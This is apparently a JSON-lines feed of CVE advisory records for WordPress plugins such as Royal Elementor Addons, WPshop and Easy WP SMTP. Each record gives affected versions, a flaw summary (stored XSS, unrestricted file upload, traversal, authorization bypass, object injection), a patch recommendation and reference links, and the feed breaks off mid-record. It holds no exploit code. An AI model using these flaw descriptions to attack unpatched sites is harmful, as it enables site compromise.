{"CVE_ID":"CVE-2024-4489","slug":"royal-elementor-addons","versionImpact":"1.3.976","versionEndExcluding":"1.3.977","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.977, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57bf222b-5f49-46e2-be84-3e6444807096?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57bf222b-5f49-46e2-be84-3e6444807096?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.973\\\/admin\\\/templates-kit.php#L896\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.973\\\/admin\\\/templates-kit.php#L896\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4488","slug":"royal-elementor-addons","versionImpact":"1.3.976","versionEndExcluding":"1.3.977","description":"The Royal Elementor Addons and Templates for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018inline_list\u2019 parameter in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.977, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0ac434-7e85-44d4-b21e-df462f63cd9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0ac434-7e85-44d4-b21e-df462f63cd9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/form-builder\\\/widgets\\\/wpr-form-builder.php#L3238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/form-builder\\\/widgets\\\/wpr-form-builder.php#L3238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4342","slug":"royal-elementor-addons","versionImpact":"1.3.975","versionEndExcluding":"1.3.976","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's image hotspot, image accordion, off canvas, woogrid, and product mini cart widgets in all versions up to, and including, 1.3.975  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.976, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-hotspots\\\/widgets\\\/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-hotspots\\\/widgets\\\/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-accordion\\\/widgets\\\/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-accordion\\\/widgets\\\/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/offcanvas\\\/widgets\\\/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/offcanvas\\\/widgets\\\/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/theme-builder\\\/woocommerce\\\/product-mini-cart\\\/widgets\\\/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/theme-builder\\\/woocommerce\\\/product-mini-cart\\\/widgets\\\/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4087","slug":"royal-elementor-addons","versionImpact":"1.3.975","versionEndExcluding":"1.3.976","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Back to Top widget in all versions up to, and including, 1.3.975 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.976, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca7bb88-4a2c-4406-8610-15ce6e77c31f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca7bb88-4a2c-4406-8610-15ce6e77c31f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.972\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php#L684\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.972\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php#L684\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fback-to-top%2Fwidgets%2Fwpr-back-to-top.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fback-to-top%2Fwidgets%2Fwpr-back-to-top.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3887","slug":"royal-elementor-addons","versionImpact":"1.3.974","versionEndExcluding":"1.3.975","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Form Builder widget in all versions up to, and including, 1.3.974 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.975, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5122800d-f274-4129-84d4-02380269502c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5122800d-f274-4129-84d4-02380269502c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086890%40royal-elementor-addons&old=3081886%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086890%40royal-elementor-addons&old=3081886%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3675","slug":"royal-elementor-addons","versionImpact":"1.3.971","versionEndExcluding":"1.3.972","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Flip Carousel, Flip Box, Post Grid, and Taxonomy List widgets in all versions up to, and including, 1.3.971 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.972, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/337cbec1-c8a8-41b5-8c32-779be671120f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/337cbec1-c8a8-41b5-8c32-779be671120f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-carousel\\\/widgets\\\/wpr-flip-carousel.php#L1191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-carousel\\\/widgets\\\/wpr-flip-carousel.php#L1191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-box\\\/widgets\\\/wpr-flip-box.php#L1903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-box\\\/widgets\\\/wpr-flip-box.php#L1903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/grid\\\/widgets\\\/wpr-grid.php#L8567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/grid\\\/widgets\\\/wpr-grid.php#L8567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/taxonomy-list\\\/widgets\\\/wpr-taxonomy-list.php#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/taxonomy-list\\\/widgets\\\/wpr-taxonomy-list.php#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072880%40royal-elementor-addons&new=3072880%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072880%40royal-elementor-addons&new=3072880%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1567","slug":"royal-elementor-addons","versionImpact":"1.3.94","versionEndExcluding":"1.3.95","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to limited file uploads due to missing file type validation in the 'file_validity' function in all versions up to, and including, 1.3.94. This makes it possible for unauthenticated attackers to upload dangerous file types such as .svgz on the affected site's server which may make cross-site scripting or remote code execution possible.","recommendation":"Update to version 1.3.95, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a04705d-cd17-4b4b-b04d-de55d6479dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a04705d-cd17-4b4b-b04d-de55d6479dab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.89\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.89\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.90\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.90\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056612\\\/royal-elementor-addons\\\/tags\\\/1.3.95\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php?old=3055840&old_path=royal-elementor-addons%2Ftags%2F1.3.94%2Fclasses%2Fmodules%2Fforms%2Fwpr-file-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056612\\\/royal-elementor-addons\\\/tags\\\/1.3.95\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php?old=3055840&old_path=royal-elementor-addons%2Ftags%2F1.3.94%2Fclasses%2Fmodules%2Fforms%2Fwpr-file-upload.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11903","slug":"wp-ecards-invites","versionImpact":"1.3.904","versionEndExcluding":"1.3.905","description":"The WP eCards plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ecard' shortcode in all versions up to, and including, 1.3.904 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.905, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199511%40wp-ecards-invites&new=3199511%40wp-ecards-invites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199511%40wp-ecards-invites&new=3199511%40wp-ecards-invites&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10135","slug":"wpshop","versionEndExcluding":"1.3.9.6","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajaxUpload function in versions before 1.3.9.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/g0blin.co.uk\\\/g0blin-00036\\\/\",\"name\":\"https:\\\/\\\/g0blin.co.uk\\\/g0blin-00036\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_wpshop_ecommerce_file_upload.rb\",\"name\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_wpshop_ecommerce_file_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1103406\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1103406\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpshop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpshop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32e8224d-a653-48d7-a3f4-338fc0c1dc77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32e8224d-a653-48d7-a3f4-338fc0c1dc77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8464","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.9.0","versionEndExcluding":"1.3.9.1","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.3.9.0 via the wpcf7_guest_user_id cookie. This makes it possible for unauthenticated attackers to upload and delete files outside of the originally intended directory. The impact of this vulnerability is limited, as file types are validated and only safe ones can be uploaded, while deletion is limited to the plugin's uploads folder.","recommendation":"Update to version 1.3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1018\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1018\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1050\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1050\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&new=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&new=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f7be7f-f675-4c9f-a7b3-525a3c3c5775?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f7be7f-f675-4c9f-a7b3-525a3c3c5775?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25141","slug":"easy-wp-smtp","versionEndExcluding":"1.3.9.1","description":"The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Feasy-wp-smtp&old=2052057&new_path=%2Feasy-wp-smtp&new=2052058&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Feasy-wp-smtp&old=2052057&new_path=%2Feasy-wp-smtp&new=2052058&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/vulnerability-26\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/vulnerability-26\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3515","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.9","versionEndExcluding":"1.3.9.0","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.3.8.9. This makes it possible for unauthenticated attackers to bypass the plugin's blacklist and upload .phar or other dangerous file types on the affected site's server, which may make remote code execution possible on the servers that are configured to handle .phar files as executable PHP scripts, particularly in default Apache+mod_php configurations where the file extension is not strictly validated before being passed to the PHP interpreter.","recommendation":"Update to version 1.3.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.8.8\\\/inc\\\/dnd-upload-cf7.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.8.8\\\/inc\\\/dnd-upload-cf7.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310153\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310153\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1298242-61d2-495e-bae7-96b5e12bd03d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1298242-61d2-495e-bae7-96b5e12bd03d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3715","slug":"contact-form-entries","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbc23b3-fa9d-4303-8283-1cabb2a6bb71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbc23b3-fa9d-4303-8283-1cabb2a6bb71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074165%40contact-form-entries%2Ftrunk&old=3066269%40contact-form-entries%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074165%40contact-form-entries%2Ftrunk&old=3066269%40contact-form-entries%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1951","slug":"logo-showcase-ultimate","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Logo Showcase Ultimate \u2013 Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.9, or a newer patched 